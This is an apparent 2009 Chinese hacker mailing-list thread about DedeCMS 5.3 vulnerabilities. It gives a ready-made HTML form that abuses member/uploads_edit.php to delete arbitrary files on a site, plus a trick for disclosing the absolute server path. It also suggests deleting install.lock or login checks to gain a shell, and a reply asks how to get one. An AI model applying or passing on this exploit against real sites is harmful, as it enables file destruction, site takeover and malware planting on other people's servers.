怎么样才能拿到shell呢? 在 09-8-16,cnhacknet.com<[email protected]> 写道: > 1.删除网站任意文件. > 2.爆绝对路径 > 影响系统 = DedeCMS V5.3 > 1.删除任意文件. > 注册正常用户...随意找个地方上传个附件就OK. > 部分代码: > 复制代码 > <form class="mTB10 mL10 mR10" name="form1" > action="http://网站地址/member/uploads_edit.php"; method="post" > enctype="multipart/form-data"> > <input type="hidden" name="aid" value="28" /> > <input type="hidden" name="mediatype" value="1" /> > <input type="hidden" name="oldurl" value="要删除的文件" /> > <!--如value="/index.php"> > <input type="hidden" name="dopost" value="save" /> > <table cellspacing="1" class="submit"> > 修改完毕后.打开HTML页.直接点提交. > 然后在用户管理附件里点击删除. > > 2.爆路径. > 也是利用原来的html代码.. > 复制代码 > > <td align="right" valign="top">更换附件:</td> > <td><input name="addonfile" type="file" id="addonfile" > style="width:300px" /></td> > > 把type="file"删除.保存.然后打开.直接点提交. > 就可以爆路径了.. > 具体的如何利用这个漏洞拿到SHELL.就看你自己的想象力了..比如删除install.lock....比如删除用户登陆检测.. > > > > > > > > > > > ------------------ 原始邮件 ------------------ > 发件人: "wildenwolf wildenwolf"<[email protected]>; > 发送时间: 2009年8月16日(星期天) 上午8:57 > 收件人: "ph4nt0m"<[email protected]>; > > 主题: [Ph4nt0m] Re: 5.3.1dede漏洞 > > > 期待ing~~~ 在 09-8-14,噢喔猪 写道: > 我的网站,几个朋友的,,都给挂马,, > 都是dede5.3.1的。。。 > > > 是不是有漏洞了。 > > > > > >
--~--~---------~--~----~------------~-------~--~----~ 要向邮件组发送邮件,请发到 [email protected] 要退订此邮件,请发邮件至 [email protected] -~----------~----~----~----~------~----~------~--~---
